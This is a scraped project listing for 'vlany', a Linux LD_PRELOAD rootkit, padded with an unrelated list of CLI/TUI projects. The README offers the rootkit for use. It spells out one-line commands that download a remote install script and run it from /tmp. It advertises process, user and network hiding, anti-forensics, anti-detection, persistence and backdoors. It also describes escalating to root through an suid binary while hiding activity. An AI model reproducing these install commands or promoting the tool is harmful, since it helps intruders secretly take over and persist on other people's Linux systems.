All Projects → mempodippy → Vlany

mempodippy / Vlany

Licence: gpl-3.0
Linux LD_PRELOAD rootkit (x86 and x86_64 architectures)

Programming Languages

c
50402 projects - #5 most used programming language

Projects that are alternatives of or similar to Vlany

Bashmultitool
A library for bash shell program containing useful functions. Can be imported into scripts to create colourful and functional scripts and TUIs.
Stars: ✭ 27 (-96.64%)
Mutual labels:  cli, tui, library
Bdvl
LD_PRELOAD Linux rootkit (x86 & ARM)
Stars: ✭ 232 (-71.14%)
Mutual labels:  libc, rootkit, dynamic
Instapy Cli
✨ Python library and CLI to upload photo and video on Instagram. W/o a phone!
Stars: ✭ 498 (-38.06%)
Mutual labels:  cli, library
Topydo
A powerful todo list application for the console, using the todo.txt format.
Stars: ✭ 511 (-36.44%)
Mutual labels:  cli, tui
Wunderbar
Simple horizontal bar chart printer for your terminal
Stars: ✭ 572 (-28.86%)
Mutual labels:  cli, library
Toot
toot - Mastodon CLI & TUI
Stars: ✭ 455 (-43.41%)
Mutual labels:  cli, tui
Bubbles
TUI components for Bubble Tea 🍡
Stars: ✭ 467 (-41.92%)
Mutual labels:  cli, tui
Nve
Run any command on specific Node.js versions
Stars: ✭ 531 (-33.96%)
Mutual labels:  cli, library
Fire Hpp
Fire for C++: Create fully functional CLIs using function signatures
Stars: ✭ 395 (-50.87%)
Mutual labels:  cli, library
Papis
Powerful and highly extensible command-line based document and bibliography manager.
Stars: ✭ 636 (-20.9%)
Mutual labels:  cli, library
Tml
🌈💻🎨 A tiny markup language for terminal output. Makes formatting output in CLI apps easier!
Stars: ✭ 634 (-21.14%)
Mutual labels:  cli, tui
Wordops
Install and manage a high performance WordPress stack with a few keystrokes
Stars: ✭ 649 (-19.28%)
Mutual labels:  cli, debian
Bubbletea
A powerful little TUI framework 🏗
Stars: ✭ 7,886 (+880.85%)
Mutual labels:  cli, tui
Pulsemixer
CLI and curses mixer for PulseAudio
Stars: ✭ 441 (-45.15%)
Mutual labels:  cli, tui
Ferret
Declarative web scraping
Stars: ✭ 4,837 (+501.62%)
Mutual labels:  cli, library
Create React Library
⚡CLI for creating reusable react libraries.
Stars: ✭ 4,554 (+466.42%)
Mutual labels:  cli, library
Transity
Keep track of your 💵, 🕘, 🐖, 🐄, 🍻 on your command line
Stars: ✭ 528 (-34.33%)
Mutual labels:  cli, tui
So
A terminal interface for Stack Overflow
Stars: ✭ 694 (-13.68%)
Mutual labels:  cli, tui
Visidata
A terminal spreadsheet multitool for discovering and arranging data
Stars: ✭ 4,606 (+472.89%)
Mutual labels:  cli, tui
Swaggen
OpenAPI/Swagger 3.0 Parser and Swift code generator
Stars: ✭ 385 (-52.11%)
Mutual labels:  cli, library

VLANY IS NO LONGER MAINTAINED.

https://github.com/naworkcaj/bdvl IS. PLEASE REFER TO THAT FOR CONSTANT UPDATES.

vlany (wiki)

vlany is a Linux LD_PRELOAD rootkit.

Installing

  • vlany's quick_install.sh script is the fastest/easiest method of installation. [email protected]:~# wget https://gist.githubusercontent.com/mempodippy/d93fd99164bace9e63752afb791a896b/raw/6b06d235beac8590f56c47b7f46e2e4fac9cf584/quick_install.sh -O /tmp/quick_install.sh && chmod +x /tmp/quick_install.sh && /tmp/quick_install.sh The quick_install.sh script automatically downloads the latest version of vlany from this repository, untars the archive, then executes the regular installation script from a new random directory in /tmp/. By default, the quick_install.sh script removes the new directory once execution has completely finished.

  • It's very simple to install vlany onto a sytem as it comes with an automated install script.
    To install vlany you want to first download it from our GitHub ( Always up to date and trusted )
    [email protected]:~# wget https://github.com/mempodippy/vlany/archive/master.tar.gz && tar xvpfz master.tar.gz

  • Once it's downloaded you just have to run install.sh inside vlany-master.
    [email protected]:~# cd vlany-master && ./install.sh
    By default this will prompt you with a tui installation but if cli is prefered you can use the --cli argument to invoke a similar cli installation.

ASCIICAST OF INSTALLATION

Regular tui installation on a Debian 8 box using an suid binary to escalate privileges from a tmp user. In a real life scenario, you'll want to play with some environment variables to prevent anyone from seeing your activity when root.

Downloads

quick_install.sh vlany.tar.gz populated const.h (after config.py execution)

Features

  • Process hiding
  • User hiding
  • Network hiding
  • LXC container
  • Anti-Debug
  • Anti-Forensics
  • Persistent (re)installation & Anti-Detection
  • Dynamic linker modifications
  • Backdoors
  • vlany-exclusive commands

Known bugs

Any bugs listed here will be present until a resolve has been reached. If a bug has been reported as an issue, the corresponding issue will also be linked in the bug listing. Should a bug be resolved, the listing will be removed from here, and if any issue is still open pertaining to the bug, it will be closed.

Serious bugs

  1. There is currently an experimental reboot brick fix. Some systems will brick, others won't. Please report any systems that brick on reboot as an issue, and give the circumstances of the vlany installation in the report. Take a look at the Issues page to see if a similar issue has already been submitted.
  2. vlany fails to install correctly on anything above CentOS 6.6.

In-depth README.txt (very detailed but not maintained)

NOTE: vlany is in active development. Changes are constantly being made to this repository, so beware that vlany is very experimental.

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].